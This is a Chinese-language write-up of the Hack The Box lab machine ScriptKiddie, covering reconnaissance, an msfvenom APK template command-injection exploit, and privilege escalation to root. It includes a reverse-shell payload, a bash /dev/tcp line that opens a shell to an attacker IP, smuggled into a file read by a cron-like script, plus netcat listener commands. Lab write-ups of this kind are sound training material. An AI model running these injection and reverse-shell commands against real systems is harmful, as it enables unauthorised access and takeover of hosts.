HTB靶场系列之ScriptKiddie通关攻略

本次writeup内容是Hack The Box里machines的靶场ScriptKiddie。

1-信息收集

首先使用Nmap进行端口嗅探，发现开放22和5000端口。

访问5000端口，发现WEB内容是一个黑客工具页面。

使用该页面的nmap扫描127.0.0.1，发现目标主机开放的端口（22、5000）和运行Nmap 7.80版本，未发现其他信息。

除了nmap外还有venom，查找了一下关于venom的相关漏洞。

搜索venom发现存在APK模板命令注入漏洞。

2-漏洞利用

使用msf去利用该漏洞。

设置好IP和端口后执行，获得脚本msf.apk。

在WEB中将msf.apk进行上传，因上传的文件为apk，需将WEB页面中的os选为android，并填写kali攻击机的IP后进行上传。

然后kali本地监听4444端口（nc -vlnp 4444），成功连接。

执行下面命令来获取一个稳定的shell：

SHELL=/bin/bash script -q /dev/null

当前账号权限为kid，查找user.txt文件，获取到第一个FLAG。

3-权限提升

查找的过程中发现home目录下有一个pwn的目录。

查看该目录下内容发现靶机存在有一个pwn用户，且有一个scanlosers.sh脚本。

查看scanlosers.sh脚本内容，发现scanlosers.sh脚本会一直扫描/home/kid/logs/hackers文件中的ip。

查看脚本末的内容sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &，发现未对hackers文件传入的内容做过滤，且/home/kid/logs/hackers文件当前用户kid可编辑。

因此可以将恶意代码写入hackers文件中，把pwn用户的权限反弹给我们：

echo "test   ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.10/6666 0>&1' #" >>hackers

此时shell脚本中扫描命令变为

sh -c "nmap --top-ports 10 -oN recon/test  ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.10/6666 0>&1' #.nmap test  ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' # 2>/dev/null" &

使用nc本地新监听个端口6666：

nc -nvlp 6666

成功连接。

使用sudo -l检查一下pwn用户的权限，发现pwn用户拥有msf的权限，且不需要root密码，那么可以直接进入msf调用root权限。

执行命令：

sudo /opt/metasploit-framework-6.0.9/msfconsole

成功使用root权限进入msf，此时已经拥有root权限，直接进入root目录拿到root用户的FLAG。

提交成功。

原文始发于微信公众号（Matrix1024）：HTB靶场系列之ScriptKiddie通关攻略